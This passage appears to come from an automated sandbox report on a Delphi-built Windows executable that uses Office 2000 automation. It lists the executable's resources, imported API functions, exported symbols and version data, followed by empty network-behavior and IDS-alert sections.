                                                                                                                                                                                                                          RT_RCDATA0x3d81900x10data1.5
                                                                                                                                                                                                                          RT_RCDATA0x3d81a00x2dataEnglishUnited States5.0
                                                                                                                                                                                                                          RT_RCDATA0x3d81a40x395Delphi compiled form 'TForm1'0.6030534351145038
                                                                                                                                                                                                                          RT_GROUP_CURSOR0x3d853c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                                                                                                                                          RT_GROUP_CURSOR0x3d85500x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                          RT_GROUP_CURSOR0x3d85640x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                                                                                                                                          RT_GROUP_CURSOR0x3d85780x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                          RT_GROUP_CURSOR0x3d858c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                          RT_GROUP_CURSOR0x3d85a00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                          RT_GROUP_CURSOR0x3d85b40x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                          RT_GROUP_CURSOR0x3d85c80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                          RT_GROUP_ICON0x3d85dc0x14dataEnglishUnited States1.15
                                                                                                                                                                                                                          RT_VERSION0x3d85f00x140MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79EnglishUnited States0.55
                                                                                                                                                                                                                          DLLImport
                                                                                                                                                                                                                          ADVAPI32.DLLRegCloseKey, RegConnectRegistryW, RegCreateKeyExW, RegDeleteKeyW, RegDeleteValueW, RegEnumKeyExW, RegEnumValueW, RegFlushKey, RegLoadKeyW, RegOpenKeyExW, RegQueryInfoKeyW, RegQueryValueExW, RegReplaceKeyW, RegRestoreKeyW, RegSaveKeyW, RegSetValueExW, RegUnLoadKeyW
                                                                                                                                                                                                                          KERNEL32.DLLCloseHandle, CompareStringW, CreateEventW, CreateFileA, CreateFileW, CreateThread, DeleteCriticalSection, DeleteFileA, EnterCriticalSection, EnumCalendarInfoW, EnumResourceNamesW, EnumSystemLocalesW, ExitProcess, ExitThread, FileTimeToSystemTime, FindClose, FindFirstFileW, FindResourceW, FormatMessageW, FreeLibrary, FreeResource, GetACP, GetCPInfo, GetCPInfoExW, GetCommandLineW, GetComputerNameW, GetCurrentProcess, GetCurrentProcessId, GetCurrentThread, GetCurrentThreadId, GetDateFormatW, GetDiskFreeSpaceW, GetEnvironmentStringsW, GetExitCodeThread, GetFileAttributesA, GetFileAttributesW, GetFileType, GetFullPathNameW, GetLastError, GetLocalTime, GetLocaleInfoA, GetLocaleInfoW, GetModuleFileNameA, GetModuleFileNameW, GetModuleHandleA, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoA, GetStartupInfoW, GetStdHandle, GetStringTypeA, GetStringTypeW, GetSystemDefaultLangID, GetSystemDefaultUILanguage, GetSystemInfo, GetSystemTimes, GetThreadLocale, GetThreadPriority, GetTickCount, GetTimeZoneInformation, GetUserDefaultLCID, GetUserDefaultUILanguage, GetVersion, GetVersionExA, GetVersionExW, GlobalAddAtomW, GlobalAlloc, GlobalDeleteAtom, GlobalFindAtomW, GlobalFree, GlobalLock, GlobalSize, GlobalUnlock, HeapAlloc, HeapCreate, HeapDestroy, HeapFree, HeapSize, InitializeCriticalSection, InterlockedCompareExchange, InterlockedDecrement, InterlockedExchange, InterlockedIncrement, IsDBCSLeadByteEx, IsDebuggerPresent, IsValidLocale, LCMapStringA, LeaveCriticalSection, LoadLibraryA, LoadLibraryExW, LoadLibraryW, LoadResource, LocalAlloc, LocalFree, LockResource, MulDiv, MultiByteToWideChar, QueryPerformanceCounter, RaiseException, ReadFile, ResetEvent, ResumeThread, RtlUnwind, SetConsoleCtrlHandler, SetEndOfFile, SetErrorMode, SetEvent, SetFilePointer, SetHandleCount, SetLastError, SetThreadLocale, SetThreadPriority, SizeofResource, Sleep, SuspendThread, SwitchToThread, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, TryEnterCriticalSection, UnhandledExceptionFilter, VirtualAlloc, VirtualFree, VirtualProtect, VirtualQuery, VirtualQueryEx, WaitForMultipleObjectsEx, WaitForSingleObject, WideCharToMultiByte, WriteFile, lstrcmpW, lstrlenW
                                                                                                                                                                                                                          VERSION.DLLGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
                                                                                                                                                                                                                          WINSPOOL.DRVClosePrinter, DocumentPropertiesW, EnumPrintersW, OpenPrinterW
                                                                                                                                                                                                                          COMCTL32.DLLFlatSB_GetScrollInfo, FlatSB_GetScrollPos, FlatSB_SetScrollInfo, FlatSB_SetScrollPos, FlatSB_SetScrollProp, ImageList_Add, ImageList_BeginDrag, ImageList_Copy, ImageList_Create, ImageList_Destroy, ImageList_DragEnter, ImageList_DragLeave, ImageList_DragMove, ImageList_DragShowNolock, ImageList_Draw, ImageList_DrawEx, ImageList_EndDrag, ImageList_GetBkColor, ImageList_GetDragImage, ImageList_GetIcon, ImageList_GetIconSize, ImageList_GetImageCount, ImageList_GetImageInfo, ImageList_LoadImageW, ImageList_Read, ImageList_Remove, ImageList_Replace, ImageList_ReplaceIcon, ImageList_SetBkColor, ImageList_SetIconSize, ImageList_SetImageCount, ImageList_SetOverlayImage, ImageList_Write, InitializeFlatSB, _TrackMouseEvent
                                                                                                                                                                                                                          COMDLG32.DLLGetOpenFileNameW
                                                                                                                                                                                                                          GDI32.DLLAbortDoc, AngleArc, Arc, ArcTo, BitBlt, Chord, CombineRgn, CopyEnhMetaFileW, CreateBitmap, CreateBrushIndirect, CreateCompatibleBitmap, CreateCompatibleDC, CreateDCW, CreateDIBSection, CreateDIBitmap, CreateFontIndirectW, CreateHalftonePalette, CreateICW, CreatePalette, CreatePatternBrush, CreatePenIndirect, CreateRectRgn, CreateRoundRectRgn, CreateSolidBrush, DeleteDC, DeleteEnhMetaFile, DeleteMetaFile, DeleteObject, Ellipse, EndDoc, EndPage, EnumFontFamiliesExW, EnumFontsW, ExcludeClipRect, ExtCreatePen, ExtCreateRegion, ExtFloodFill, ExtTextOutW, FrameRgn, GdiFlush, GetBitmapBits, GetBrushOrgEx, GetClipBox, GetCurrentObject, GetCurrentPositionEx, GetDIBColorTable, GetDIBits, GetDeviceCaps, GetEnhMetaFileBits, GetEnhMetaFileDescriptionW, GetEnhMetaFileHeader, GetEnhMetaFilePaletteEntries, GetObjectW, GetPaletteEntries, GetPixel, GetRgnBox, GetStockObject, GetSystemPaletteEntries, GetTextColor, GetTextExtentPoint32W, GetTextExtentPointW, GetTextMetricsW, GetViewportOrgEx, GetWinMetaFileBits, GetWindowOrgEx, IntersectClipRect, LineTo, MaskBlt, MoveToEx, PatBlt, Pie, PlayEnhMetaFile, PolyBezier, PolyBezierTo, PolyPolyline, Polygon, Polyline, RealizePalette, RectVisible, Rectangle, RestoreDC, RoundRect, SaveDC, SelectClipRgn, SelectObject, SelectPalette, SetAbortProc, SetBkColor, SetBkMode, SetBrushOrgEx, SetDIBColorTable, SetDIBits, SetEnhMetaFileBits, SetMapMode, SetPixel, SetROP2, SetStretchBltMode, SetTextColor, SetViewportExtEx, SetViewportOrgEx, SetWinMetaFileBits, SetWindowExtEx, SetWindowOrgEx, StartDocW, StartPage, StretchBlt, StretchDIBits, UnrealizeObject
                                                                                                                                                                                                                          SHELL32.DLLShell_NotifyIconW
                                                                                                                                                                                                                          USER32.DLLActivateKeyboardLayout, AdjustWindowRectEx, BeginPaint, CallNextHookEx, CallWindowProcW, CharLowerBuffW, CharLowerW, CharNextW, CharUpperBuffW, CharUpperW, CheckMenuItem, ChildWindowFromPoint, ClientToScreen, CloseClipboard, CopyIcon, CopyImage, CountClipboardFormats, CreateAcceleratorTableW, CreateCaret, CreateIcon, CreateMenu, CreatePopupMenu, CreateWindowExW, DefFrameProcW, DefMDIChildProcW, DefWindowProcW, DeleteMenu, DestroyAcceleratorTable, DestroyCaret, DestroyCursor, DestroyIcon, DestroyMenu, DestroyWindow, DispatchMessageA, DispatchMessageW, DrawEdge, DrawFocusRect, DrawFrameControl, DrawIcon, DrawIconEx, DrawMenuBar, DrawTextExW, DrawTextW, EmptyClipboard, EnableMenuItem, EnableScrollBar, EnableWindow, EndMenu, EndPaint, EnumChildWindows, EnumClipboardFormats, EnumDisplayMonitors, EnumThreadWindows, EnumWindows, FillRect, FindWindowExW, FindWindowW, FrameRect, GetActiveWindow, GetCapture, GetCaretPos, GetClassInfoExW, GetClassInfoW, GetClassLongW, GetClassNameW, GetClientRect, GetClipboardData, GetCursor, GetCursorPos, GetDC, GetDCEx, GetDesktopWindow, GetDlgCtrlID, GetDlgItem, GetDoubleClickTime, GetFocus, GetForegroundWindow, GetIconInfo, GetKeyNameTextW, GetKeyState, GetKeyboardLayout, GetKeyboardLayoutList, GetKeyboardLayoutNameW, GetKeyboardState, GetLastActivePopup, GetMenu, GetMenuItemCount, GetMenuItemID, GetMenuItemInfoW, GetMenuState, GetMenuStringW, GetMessageExtraInfo, GetMessagePos, GetMessageTime, GetMonitorInfoW, GetParent, GetPropW, GetScrollBarInfo, GetScrollInfo, GetScrollPos, GetScrollRange, GetSubMenu, GetSysColor, GetSysColorBrush, GetSystemMenu, GetSystemMetrics, GetTopWindow, GetUpdateRect, GetWindow, GetWindowDC, GetWindowLongW, GetWindowPlacement, GetWindowRect, GetWindowTextW, GetWindowThreadProcessId, HideCaret, InsertMenuItemW, InsertMenuW, InvalidateRect, IsCharAlphaNumericW, IsCharAlphaW, IsChild, IsClipboardFormatAvailable, IsDialogMessageA, IsDialogMessageW, IsIconic, IsWindow, IsWindowEnabled, IsWindowUnicode, IsWindowVisible, IsZoomed, KillTimer, LoadBitmapW, LoadCursorW, LoadIconW, LoadKeyboardLayoutW, LoadStringW, LockWindowUpdate, MapVirtualKeyW, MapWindowPoints, MessageBeep, MessageBoxA, MessageBoxW, MonitorFromPoint, MonitorFromRect, MonitorFromWindow, MsgWaitForMultipleObjects, MsgWaitForMultipleObjectsEx, OpenClipboard, PeekMessageA, PeekMessageW, PostMessageW, PostQuitMessage, RedrawWindow, RegisterClassW, RegisterClipboardFormatW, RegisterWindowMessageW, ReleaseCapture, ReleaseDC, RemoveMenu, RemovePropW, ScreenToClient, ScrollWindow, ScrollWindowEx, SendMessageA, SendMessageW, SetActiveWindow, SetCapture, SetCaretPos, SetClassLongW, SetClipboardData, SetCursor, SetCursorPos, SetFocus, SetForegroundWindow, SetKeyboardState, SetMenu, SetMenuItemInfoW, SetParent, SetPropW, SetRect, SetScrollInfo, SetScrollPos, SetScrollRange, SetTimer, SetWindowLongW, SetWindowPlacement, SetWindowPos, SetWindowRgn, SetWindowTextW, SetWindowsHookExW, ShowCaret, ShowOwnedPopups, ShowScrollBar, ShowWindow, SystemParametersInfoW, TrackMouseEvent, TrackPopupMenu, TranslateMDISysAccel, TranslateMessage, UnhookWindowsHookEx, UnregisterClassW, UpdateWindow, ValidateRect, WaitMessage, WindowFromPoint, wsprintfA
                                                                                                                                                                                                                          OLE32.DLLCLSIDFromProgID, CoCreateGuid, CoCreateInstance, CoInitialize, CoTaskMemAlloc, CoTaskMemFree, CoUninitialize, CreateBindCtx, CreateILockBytesOnHGlobal, GetHGlobalFromILockBytes, IsEqualGUID, OleCreate, OleCreateFromData, OleCreateFromFile, OleCreateLinkFromData, OleCreateLinkToFile, OleDraw, OleGetClipboard, OleGetIconOfClass, OleInitialize, OleIsRunning, OleLoad, OleQueryCreateFromData, OleQueryLinkFromData, OleRun, OleSave, OleSetClipboard, OleSetContainedObject, OleSetMenuDescriptor, OleUninitialize, ProgIDFromCLSID, ReleaseStgMedium, StgCreateDocfile, StgCreateDocfileOnILockBytes, StgOpenStorageOnILockBytes, StringFromCLSID
                                                                                                                                                                                                                          OLEAUT32.DLLGetActiveObject, GetErrorInfo, SafeArrayCreate, SafeArrayGetLBound, SafeArrayGetUBound, SafeArrayPtrOfIndex, SysAllocStringLen, SysFreeString, SysReAllocStringLen, SysStringLen, VariantChangeType, VariantClear, VariantCopy, VariantInit
                                                                                                                                                                                                                          OLEDLG.DLLOleUIChangeIconW, OleUIInsertObjectW, OleUIObjectPropertiesW, OleUIPasteSpecialW
                                                                                                                                                                                                                          NameOrdinalAddress
                                                                                                                                                                                                                          @$xp$17Word_2k@TWordFont80x403b94
                                                                                                                                                                                                                          @$xp$20Excel_2k@TExcelChart17040x7008f4
                                                                                                                                                                                                                          @$xp$21Access_2k@TAccessForm7190x6dd3d4
                                                                                                                                                                                                                          @$xp$21Word_2k@TWordDocument100x403c88
                                                                                                                                                                                                                          @$xp$23Access_2k@TAccessReport7170x6dd1d0
                                                                                                                                                                                                                          @$xp$23Excel_2k@TExcelWorkbook17000x70024c
                                                                                                                                                                                                                          @$xp$24Excel_2k@TExcelOLEObject16980x7000f8
                                                                                                                                                                                                                          @$xp$24Excel_2k@TExcelWorksheet17020x7006a4
                                                                                                                                                                                                                          @$xp$24Word_2k@TWordApplication20x403634
                                                                                                                                                                                                                          @$xp$25Excel_2k@TExcelQueryTable17080x7010dc
                                                                                                                                                                                                                          @$xp$26Excel_2k@TExcelApplication17060x700bf0
                                                                                                                                                                                                                          @$xp$26Word_2k@TWordLetterContent40x403994
                                                                                                                                                                                                                          @$xp$27Access_2k@TAccessReferences7130x6dcf68
                                                                                                                                                                                                                          @$xp$28Access_2k@TAccessApplication7150x6dd0c4
                                                                                                                                                                                                                          @$xp$28Word_2k@TWordParagraphFormat60x403a94
                                                                                                                                                                                                                          @$xp$ynpqqrp14System@TObject$v120x403de4
                                                                                                                                                                                                                          @$xp$ynpqqrp14System@TObjectp15Excel_2k@WINDOW$v17180x701f14
                                                                                                                                                                                                                          @$xp$ynpqqrp14System@TObjectp17Word_2k@_Document$v130x403e2c
                                                                                                                                                                                                                          @$xp$ynpqqrp14System@TObjectp17Word_2k@_Documentp14Word_2k@WINDOW$v160x40401c
                                                                                                                                                                                                                          @$xp$ynpqqrp14System@TObjectp17Word_2k@_Documentps$v140x403ea4
                                                                                                                                                                                                                          @$xp$ynpqqrp14System@TObjectp17Word_2k@_Documentpst3$v150x403f4c
                                                                                                                                                                                                                          @$xp$ynpqqrp14System@TObjectp18Excel_2k@Hyperlink$v17160x701df4
                                                                                                                                                                                                                          @$xp$ynpqqrp14System@TObjectp19Excel_2k@ExcelRange$v17140x701ccc
                                                                                                                                                                                                                          @$xp$ynpqqrp14System@TObjectp19Excel_2k@ExcelRangeps$v17150x701d4c
                                                                                                                                                                                                                          @$xp$ynpqqrp14System@TObjectp21Word_2k@WordSelection$v170x4040b0
                                                                                                                                                                                                                          @$xp$ynpqqrp14System@TObjectp21Word_2k@WordSelectionps$v180x404134
                                                                                                                                                                                                                          @$xp$ynpqqrp14System@TObjectp9IDispatch$v17120x70163c
                                                                                                                                                                                                                          @$xp$ynpqqrp14System@TObjectp9IDispatchp18Excel_2k@Hyperlink$v17130x701954
                                                                                                                                                                                                                          @$xp$ynpqqrp14System@TObjectp9IDispatchp19Excel_2k@ExcelRange$v17100x7014cc
                                                                                                                                                                                                                          @$xp$ynpqqrp14System@TObjectp9IDispatchp19Excel_2k@ExcelRangeps$v17110x701570
                                                                                                                                                                                                                          @$xp$ynpqqrp14System@TObjectsps$v17170x701e70
                                                                                                                                                                                                                          @@Access_2k@Finalize24270x719518
                                                                                                                                                                                                                          @@Access_2k@Initialize24260x719508
                                                                                                                                                                                                                          @@Access_2k_srvr@Finalize7220x6dddcc
                                                                                                                                                                                                                          @@Access_2k_srvr@Initialize7210x6dddbc
                                                                                                                                                                                                                          @@Excel_2k@Finalize24290x719538
                                                                                                                                                                                                                          @@Excel_2k@Initialize24280x719528
                                                                                                                                                                                                                          @@Excel_2k_srvr@Finalize17200x7023e0
                                                                                                                                                                                                                          @@Excel_2k_srvr@Initialize17190x7023d0
                                                                                                                                                                                                                          @@Unit1@Finalize200x404ee4
                                                                                                                                                                                                                          @@Unit1@Initialize190x404ed4
                                                                                                                                                                                                                          @@Word_2k@Finalize24310x719558
                                                                                                                                                                                                                          @@Word_2k@Initialize24300x719548
                                                                                                                                                                                                                          @@Word_2k_srvr@Finalize24250x7194f8
                                                                                                                                                                                                                          @@Word_2k_srvr@Initialize24240x7194e8
                                                                                                                                                                                                                          @Access_2k@CLSID_AccessApplication25630x7757a0
                                                                                                                                                                                                                          @Access_2k@CLSID_AccessBoundObjectFrame25020x7753d0
                                                                                                                                                                                                                          @Access_2k@CLSID_AccessCheckBox24940x775350
                                                                                                                                                                                                                          @Access_2k@CLSID_AccessComboBox25110x775460
                                                                                                                                                                                                                          @Access_2k@CLSID_AccessCommandButton24860x7752d0
                                                                                                                                                                                                                          @Access_2k@CLSID_AccessControl24660x775190
                                                                                                                                                                                                                          @Access_2k@CLSID_AccessCustomControl25340x7755d0
                                                                                                                                                                                                                          @Access_2k@CLSID_AccessField24590x775120
                                                                                                                                                                                                                          @Access_2k@CLSID_AccessForm25550x775720
                                                                                                                                                                                                                          @Access_2k@CLSID_AccessGroupLevel25460x775690
                                                                                                                                                                                                                          @Access_2k@CLSID_AccessHyperlink24620x775150
                                                                                                                                                                                                                          @Access_2k@CLSID_AccessImage24830x7752a0
                                                                                                                                                                                                                          @Access_2k@CLSID_AccessLabel24720x7751f0
                                                                                                                                                                                                                          @Access_2k@CLSID_AccessLine24800x775270
                                                                                                                                                                                                                          @Access_2k@CLSID_AccessListBox25080x775430
                                                                                                                                                                                                                          @Access_2k@CLSID_AccessObjectFrame25140x775490
                                                                                                                                                                                                                          @Access_2k@CLSID_AccessOptionButton24890x775300
                                                                                                                                                                                                                          @Access_2k@CLSID_AccessOptionGroup24990x7753a0
                                                                                                                                                                                                                          @Access_2k@CLSID_AccessPage24630x775160
                                                                                                                                                                                                                          @Access_2k@CLSID_AccessPageBreak25170x7754c0
                                                                                                                                                                                                                          @Access_2k@CLSID_AccessPaletteButton25250x775540
                                                                                                                                                                                                                          @Access_2k@CLSID_AccessRectangle24770x775240
                                                                                                                                                                                                                          @Access_2k@CLSID_AccessReferences25670x7757e0
                                                                                                                                                                                                                          @Access_2k@CLSID_AccessReport25590x775760
                                                                                                                                                                                                                          @Access_2k@CLSID_AccessSection25440x775670
                                                                                                                                                                                                                          @Access_2k@CLSID_AccessSubForm25280x775570
                                                                                                                                                                                                                          @Access_2k@CLSID_AccessSubReport25310x7755a0
                                                                                                                                                                                                                          @Access_2k@CLSID_AccessTabControl25390x775620
                                                                                                                                                                                                                          @Access_2k@CLSID_AccessTextBox25050x775400
                                                                                                                                                                                                                          @Access_2k@CLSID_AccessToggleButton25200x7754f0
                                                                                                                                                                                                                          @Access_2k@CLSID_AccessWebOptions25970x7759c0
                                                                                                                                                                                                                          @Access_2k@CLSID_AllDataAccessPages25770x775880
                                                                                                                                                                                                                          @Access_2k@CLSID_AllDatabaseDiagrams25820x7758d0
                                                                                                                                                                                                                          @Access_2k@CLSID_AllForms25730x775840
                                                                                                                                                                                                                          @Access_2k@CLSID_AllMacros25750x775860
                                                                                                                                                                                                                          @Access_2k@CLSID_AllModules25760x775870
                                                                                                                                                                                                                          @Access_2k@CLSID_AllQueries25790x7758a0
                                                                                                                                                                                                                          @Access_2k@CLSID_AllReports25740x775850
                                                                                                                                                                                                                          @Access_2k@CLSID_AllStoredProcedures25810x7758c0
                                                                                                                                                                                                                          @Access_2k@CLSID_AllTables25780x775890
                                                                                                                                                                                                                          @Access_2k@CLSID_AllViews25800x7758b0
                                                                                                                                                                                                                          @Access_2k@CLSID_Class25990x7759e0
                                                                                                                                                                                                                          @Access_2k@CLSID_CodeData25900x775950
                                                                                                                                                                                                                          @Access_2k@CLSID_CodeProject25890x775940
                                                                                                                                                                                                                          @Access_2k@CLSID_CurrentData25880x775930
                                                                                                                                                                                                                          @Access_2k@CLSID_CurrentProject25870x775920
                                                                                                                                                                                                                          @Access_2k@CLSID_DataAccessPage25700x775810
                                                                                                                                                                                                                          @Access_2k@CLSID_DefaultWebOptions25950x7759a0
                                                                                                                                                                                                                          @Access_2k@CLSID_FormatCondition24540x7750d0
                                                                                                                                                                                                                          @Access_2k@CLSID_WizHook25930x775980
                                                                                                                                                                                                                          @Access_2k@CLSID__CheckBoxInOption24960x775370
                                                                                                                                                                                                                          @Access_2k@CLSID__ChildLabel24740x775210
                                                                                                                                                                                                                          @Access_2k@CLSID__ControlInReportEvents24680x7751b0
                                                                                                                                                                                                                          @Access_2k@CLSID__CustomControlInReport25360x7755f0
                                                                                                                                                                                                                          @Access_2k@CLSID__OptionButtonInOption24910x775320
                                                                                                                                                                                                                          @Access_2k@CLSID__PageHdrFtrInReport25500x7756d0
                                                                                                                                                                                                                          @Access_2k@CLSID__SectionInReport25480x7756b0
                                                                                                                                                                                                                          @Access_2k@CLSID__ToggleButtonInOption25220x775510
                                                                                                                                                                                                                          @Access_2k@DIID__References_Events25660x7757d0
                                                                                                                                                                                                                          @Access_2k@IID_AccessObject25910x775960
                                                                                                                                                                                                                          @Access_2k@IID_AccessObjectProperties25840x7758f0
                                                                                                                                                                                                                          @Access_2k@IID_AccessObjectProperty25830x7758e0
                                                                                                                                                                                                                          @Access_2k@IID_AllObjects25720x775830
                                                                                                                                                                                                                          @Access_2k@IID_Children24570x775100
                                                                                                                                                                                                                          @Access_2k@IID_Controls_24690x7751c0
                                                                                                                                                                                                                          @Access_2k@IID_DataAccessPages25710x775820
                                                                                                                                                                                                                          @Access_2k@IID_DoCmd24490x775080
                                                                                                                                                                                                                          @Access_2k@IID_FormatConditions24550x7750e0
                                                                                                                                                                                                                          @Access_2k@IID_Forms_25560x775730
                                                                                                                                                                                                                          @Access_2k@IID_Module25510x7756e0
                                                                                                                                                                                                                          @Access_2k@IID_Modules25520x7756f0
                                                                                                                                                                                                                          @Access_2k@IID_Pages24640x775170
                                                                                                                                                                                                                          @Access_2k@IID_Properties24520x7750b0
                                                                                                                                                                                                                          @Access_2k@IID_Reference25640x7757b0
                                                                                                                                                                                                                          @Access_2k@IID_Reports25600x775770
                                                                                                                                                                                                                          @Access_2k@IID_Screen25610x775780
                                                                                                                                                                                                                          @Access_2k@IID__AccessField24580x775110
                                                                                                                                                                                                                          @Access_2k@IID__AccessProperty24510x7750a0
                                                                                                                                                                                                                          @Access_2k@IID__Application25620x775790
                                                                                                                                                                                                                          @Access_2k@IID__BoundObjectFrame25000x7753b0
                                                                                                                                                                                                                          @Access_2k@IID__BoundObjectFrameEvents25010x7753c0
                                                                                                                                                                                                                          @Access_2k@IID__CheckBoxEvents24930x775340
                                                                                                                                                                                                                          @Access_2k@IID__CheckBoxInOptionEvents24950x775360
                                                                                                                                                                                                                          @Access_2k@IID__Checkbox24920x775330
                                                                                                                                                                                                                          @Access_2k@IID__ChildLabelEvents24730x775200
                                                                                                                                                                                                                          @Access_2k@IID__ComboBoxEvents25100x775450
                                                                                                                                                                                                                          @Access_2k@IID__Combobox25090x775440
                                                                                                                                                                                                                          @Access_2k@IID__CommandButton24840x7752b0
                                                                                                                                                                                                                          @Access_2k@IID__CommandButtonEvents24850x7752c0
                                                                                                                                                                                                                          @Access_2k@IID__Control24650x775180
                                                                                                                                                                                                                          @Access_2k@IID__CurrentData25860x775910
                                                                                                                                                                                                                          @Access_2k@IID__CurrentProject25850x775900
                                                                                                                                                                                                                          @Access_2k@IID__CustomControl25320x7755b0
                                                                                                                                                                                                                          @Access_2k@IID__CustomControlEvents25330x7755c0
                                                                                                                                                                                                                          @Access_2k@IID__CustomControlInReportEvents25350x7755e0
                                                                                                                                                                                                                          @Access_2k@IID__DataAccessPage25690x775800
                                                                                                                                                                                                                          @Access_2k@IID__DefaultWebOptions25940x775990
                                                                                                                                                                                                                          @Access_2k@IID__Dummy25680x7757f0
                                                                                                                                                                                                                          @Access_2k@IID__DummyEvents25980x7759d0
                                                                                                                                                                                                                          @Access_2k@IID__Form25530x775700
                                                                                                                                                                                                                          @Access_2k@IID__FormEvents25540x775710
                                                                                                                                                                                                                          @Access_2k@IID__FormatCondition24530x7750c0
                                                                                                                                                                                                                          @Access_2k@IID__GroupLevel25450x775680
                                                                                                                                                                                                                          @Access_2k@IID__Hyperlink24610x775140
                                                                                                                                                                                                                          @Access_2k@IID__Image24810x775280
                                                                                                                                                                                                                          @Access_2k@IID__ImageEvents24820x775290
                                                                                                                                                                                                                          @Access_2k@IID__ItemsSelected24560x7750f0
                                                                                                                                                                                                                          @Access_2k@IID__Label24700x7751d0
                                                                                                                                                                                                                          @Access_2k@IID__LabelEvents24710x7751e0
                                                                                                                                                                                                                          @Access_2k@IID__Line24780x775250
                                                                                                                                                                                                                          @Access_2k@IID__LineEvents24790x775260
                                                                                                                                                                                                                          @Access_2k@IID__ListBox25060x775410
                                                                                                                                                                                                                          @Access_2k@IID__ListBoxEvents25070x775420
                                                                                                                                                                                                                          @Access_2k@IID__ObjectFrame25120x775470
                                                                                                                                                                                                                          @Access_2k@IID__ObjectFrameEvents25130x775480
                                                                                                                                                                                                                          @Access_2k@IID__OptionButton24870x7752e0
                                                                                                                                                                                                                          @Access_2k@IID__OptionButtonEvents24880x7752f0
                                                                                                                                                                                                                          @Access_2k@IID__OptionButtonInOptionEvents24900x775310
                                                                                                                                                                                                                          @Access_2k@IID__OptionGroup24970x775380
                                                                                                                                                                                                                          @Access_2k@IID__OptionGroupEvents24980x775390
                                                                                                                                                                                                                          @Access_2k@IID__Page25400x775630
                                                                                                                                                                                                                          @Access_2k@IID__PageBreak25150x7754a0
                                                                                                                                                                                                                          @Access_2k@IID__PageBreakEvents25160x7754b0
                                                                                                                                                                                                                          @Access_2k@IID__PageEvents25410x775640
                                                                                                                                                                                                                          @Access_2k@IID__PageHdrFtrInReportEvents25490x7756c0
                                                                                                                                                                                                                          @Access_2k@IID__PaletteButton25230x775520
                                                                                                                                                                                                                          @Access_2k@IID__PaletteButtonEvents25240x775530
                                                                                                                                                                                                                          @Access_2k@IID__RecordsetEvents24500x775090
                                                                                                                                                                                                                          @Access_2k@IID__Rectangle24750x775220
                                                                                                                                                                                                                          @Access_2k@IID__RectangleEvents24760x775230
                                                                                                                                                                                                                          @Access_2k@IID__References25650x7757c0
                                                                                                                                                                                                                          @Access_2k@IID__Report25570x775740
                                                                                                                                                                                                                          @Access_2k@IID__ReportEvents25580x775750
                                                                                                                                                                                                                          @Access_2k@IID__Section25420x775650
                                                                                                                                                                                                                          @Access_2k@IID__SectionEvents25430x775660
                                                                                                                                                                                                                          @Access_2k@IID__SectionInReportEvents25470x7756a0
                                                                                                                                                                                                                          @Access_2k@IID__SubForm25260x775550
                                                                                                                                                                                                                          @Access_2k@IID__SubFormEvents25270x775560
                                                                                                                                                                                                                          @Access_2k@IID__SubReport25290x775580
                                                                                                                                                                                                                          @Access_2k@IID__SubReportEvents25300x775590
                                                                                                                                                                                                                          @Access_2k@IID__TabControl25370x775600
                                                                                                                                                                                                                          @Access_2k@IID__TabControlEvents25380x775610
                                                                                                                                                                                                                          @Access_2k@IID__TextBoxEvents25040x7753f0
                                                                                                                                                                                                                          @Access_2k@IID__Textbox25030x7753e0
                                                                                                                                                                                                                          @Access_2k@IID__ToggleButton25180x7754d0
                                                                                                                                                                                                                          @Access_2k@IID__ToggleButtonEvents25190x7754e0
                                                                                                                                                                                                                          @Access_2k@IID__ToggleButtonInOptionEvents25210x775500
                                                                                                                                                                                                                          @Access_2k@IID__WebOptions25960x7759b0
                                                                                                                                                                                                                          @Access_2k@IID__WizHook25920x775970
                                                                                                                                                                                                                          @Access_2k@IID___ControlInReportEvents24670x7751a0
                                                                                                                                                                                                                          @Access_2k@IID___Help24600x775130
                                                                                                                                                                                                                          @Access_2k@LIBID_Access24480x775070
                                                                                                                                                                                                                          @Access_2k@TAccessApplication@24390x754b68
                                                                                                                                                                                                                          @Access_2k@TAccessApplication@$bctr$qqrp25System@Classes@TComponent7160x6dd164
                                                                                                                                                                                                                          @Access_2k@TAccessApplication@AccessError$qqr10tagVARIANT6380x6d8aac
                                                                                                                                                                                                                          @Access_2k@TAccessApplication@AddAutoCorrect$qqrpbt16310x6d8820
                                                                                                                                                                                                                          @Access_2k@TAccessApplication@AddToFavorites$qqrv6460x6d8da0
                                                                                                                                                                                                                          @Access_2k@TAccessApplication@AppLoadString$qqrl6420x6d8c60
                                                                                                                                                                                                                          @Access_2k@TAccessApplication@BeforeDestruction$qqrv5820x6d7624
                                                                                                                                                                                                                          @Access_2k@TAccessApplication@BeginUndoable$qqrl6240x6d8670
                                                                                                                                                                                                                          @Access_2k@TAccessApplication@BuildCriteria$qqrpbst16260x6d86dc
                                                                                                                                                                                                                          @Access_2k@TAccessApplication@BuilderString$qqrv6390x6d8b1c
                                                                                                                                                                                                                          @Access_2k@TAccessApplication@CloseCurrentDatabase$qqrv5900x6d78f0
                                                                                                                                                                                                                          @Access_2k@TAccessApplication@CodeDb$qqrv6230x6d8620
                                                                                                                                                                                                                          @Access_2k@TAccessApplication@Connect$qqrv5800x6d73cc
                                                                                                                                                                                                                          DescriptionData
                                                                                                                                                                                                                          FileVersion1.0.0.0
                                                                                                                                                                                                                          ProductVersion1.0.0.0
                                                                                                                                                                                                                          Translation0x0804 0x03a8

                                                                                                                                                                                                                          Possible Origin

                                                                                                                                                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                          EnglishUnited States

                                                                                                                                                                                                                          Network Behavior

                                                                                                                                                                                                                          Download Network PCAP: filteredfull

                                                                                                                                                                                                                          Suricata IDS Alerts

